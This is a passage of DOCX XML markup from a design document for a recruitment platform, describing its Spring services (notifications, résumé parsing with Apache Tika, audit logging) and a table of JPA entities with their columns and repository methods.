          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: NotificationService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Dispatches in-app notifications and manages user notification read states.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>NotificationRepository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. createNotification(): Instantiates Notification entity; associates with target User; sets read=false and createdAt=now().</w:t>
        <w:br/>
        <w:t>2. getUserNotifications(): Retrieves top 50 notifications ordered by createdAt DESC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: ResumeParserService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Extracts plain text and technical skills from uploaded PDF and Word documents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Apache Tika Core &amp; Parsers, SkillRepository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. parseResume(): Streams MultipartFile bytes into Apache Tika AutoDetectParser; extracts raw string text; tokenizes words; matches tokens against Skill taxonomy in database; returns detected skills array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Service: AuditLogService.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Responsibility: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Maintains append-only governance trail for compliance and non-repudiation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>AuditLogRepository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Business Logic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>1. logAction(): Captures action name, performedBy username, client IP address, entity ID, and timestamp; saves immutable AuditLog record.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Complete Persistence Tier: 13 JPA Entities &amp; Repositories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1584"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entity Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Table Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Primary Key &amp; Columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Relational Associations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Spring Data Repository Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK, AUTO_INCREMENT)</w:t>
              <w:br/>
              <w:t>Columns: username (VARCHAR, UNIQUE, NOT NULL), email (VARCHAR, UNIQUE, NOT NULL), password (VARCHAR, NOT NULL), enabled (BOOLEAN, DEFAULT TRUE), createdAt (TIMESTAMP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToMany(Role), OneToOne(CandidateProfile), OneToMany(Application), OneToMany(Notification)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UserRepository: findByUsername, existsByUsername, existsByEmail, findByRolesContaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: name (VARCHAR, UNIQUE, NOT NULL - e.g. ROLE_CANDIDATE, ROLE_RECRUITER, ROLE_ADMIN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToMany(User)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RoleRepository: findByName(String name)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>candidate_profiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: user_id (BIGINT, FK, UNIQUE), headline (VARCHAR), bio (TEXT), yearsOfExperience (INT), expectedSalary (DECIMAL), resumeUrl (VARCHAR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToOne(User), ManyToMany(Skill) via profile_skills join table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfileRepository: findByUser(User user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Skill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: name (VARCHAR, UNIQUE, NOT NULL), category (VARCHAR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToMany(CandidateProfile), ManyToMany(Job)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SkillRepository: findByNameIgnoreCase, findByNameIn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: company_id (BIGINT, FK), category_id (BIGINT, FK), recruiter_id (BIGINT, FK), title (VARCHAR), description (TEXT), location (VARCHAR), workMode (ENUM), jobType (ENUM), salaryMin (DECIMAL), salaryMax (DECIMAL), active (BOOLEAN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ManyToOne(Company), ManyToOne(Category), ManyToOne(User/Recruiter), ManyToMany(Skill), OneToMany(Application)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobRepository: findByActiveTrue, findByRecruiter, searchJobs(JPQL JOIN FETCH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Company</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>companies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PK: id (BIGINT, PK)</w:t>
              <w:br/>
              <w:t>Columns: name (VARCHAR, UNIQUE, NOT NULL), website (VARCHAR), logoUrl (VARCHAR), description (TEXT), verified (BOOLEAN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OneToMany(Job)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
